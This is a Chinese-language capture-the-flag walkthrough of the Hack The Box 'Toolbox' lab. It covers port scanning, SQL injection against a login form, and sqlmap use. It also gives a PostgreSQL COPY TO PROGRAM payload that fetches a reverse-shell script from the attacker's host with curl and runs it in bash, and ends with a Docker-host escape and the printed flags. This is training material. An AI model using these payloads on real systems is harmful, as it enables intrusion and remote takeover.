[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升

Information Gathering

IP Address Opening Ports
10.10.10.236 TCP:21,22,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49669

$ ip='10.10.10.236'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b1aa18199eaf79602192e6e97045a3f (RSA)
|   256 a24b5ac70ff399a13aca7d542876b2dd (ECDSA)
|_  256 ea08966023e2f44f8d05b31841352339 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PostgreSQL Injection RCE

# echo '10.10.10.236 megalogistic.com admin.megalogistic.com'>>/etc/hosts

https://megalogistic.com/

https://admin.megalogistic.com/

复制代码
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=admin'&password=1

$ python3 /opt/sqlmap/sqlmap.py -u http://admin.megalogistic.com --batch --force-ssl --dbms=PostgreSQL -X POST --data 'username=admin&password=11111'

复制代码
POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=';COPY+(SELECT+'test')+TO+PROGRAM+'curl+10.10.16.33/reverse.sh|bash';--+-&password=1

User.txt

f0183e44378ea9774433e2ca6ac78c6a

Privilege Escalation:Docker Escape boot2docker

$ uname -a

$ SHELL=/bin/bash script -q /dev/null

postgres@bc56e3cc55e9:/tmp$ ssh docker@172.17.0.1

docker@box:~$ cat /c/Users/Administrator/Desktop/root.txt

Root.txt

cc9a0b76ac17f8f475250738b96261b3

相关推荐
ajassi20005 分钟前
linux C 语言开发 (八) 进程基础
linux·运维·服务器
matlab的学徒1 小时前
Web与Nginx网站服务(改)
linux·运维·前端·nginx·tomcat
LeeZhao@1 小时前
【AI推理部署】Docker篇04—Docker自动构建镜像
人工智能·docker·容器
程思扬1 小时前
利用JSONCrack与cpolar提升数据可视化及跨团队协作效率
网络·人工智能·经验分享·docker·信息可视化·容器·架构
Insist7531 小时前
prometheus安装部署与alertmanager邮箱告警
linux·运维·grafana·prometheus
xqlily2 小时前
Linux操作系统之Ubuntu
linux·运维·ubuntu
落日漫游2 小时前
dockercompose和k8s区别
docker·kubernetes
倔强的石头1062 小时前
【Linux指南】Makefile入门:从概念到基础语法
linux·运维·服务器
ajassi20002 小时前
linux C 语言开发 (七) 文件 IO 和标准 IO
linux·运维·服务器
一只游鱼3 小时前
Zookeeper介绍与部署(Linux)
linux·运维·服务器·zookeeper